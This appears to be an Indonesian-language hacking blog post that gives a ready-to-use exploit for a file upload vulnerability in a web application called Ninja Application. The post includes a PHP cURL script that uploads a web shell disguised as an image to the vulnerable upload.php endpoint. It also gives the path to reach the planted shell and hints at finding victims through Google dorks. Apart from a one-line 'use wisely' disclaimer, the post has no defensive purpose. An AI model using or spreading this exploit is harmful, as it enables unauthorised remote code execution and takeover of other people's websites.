Hai.. Kali ini gue akan memberikan Exploit yang lumayan populer, yaitu Exploit Ninja Application Remote Code Vulnerability. Oke langsung saja ke tutuorial
Dork Google : Use Your Brain !
Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
Victim : /ninja-applications/fufu/controllers/uploader/upload.php
Exploit Code :
<?php
$url = "http://localhost/ninja-applications/fufu/controllers/uploader/upload.php";
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
dan
Shell access : localhost/uploads/temp/fufu(random code)shell.php .
contoh yg didapat : fufu1239kfdyh842dlmj.php
Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux
Lalu tinggal di akses shell nya sesuai dengan yang tertera terminal ( Linux ) dan Xampp ( Windows )
CATATAN : GUNAKAN DENGAN BIJAK UNTUK TUJUAN KEBAIKAN.
Mudah Bukan? Terimakasih, Jika ada pertanyaan silahkan bisa menghubungi admin dengan meng-klik icon media sosial yang ada di bagian sidebar atau klik disini. Semoga Bermanfaat untuk kalian ^_^
Sign up here with your email
ConversionConversion EmoticonEmoticon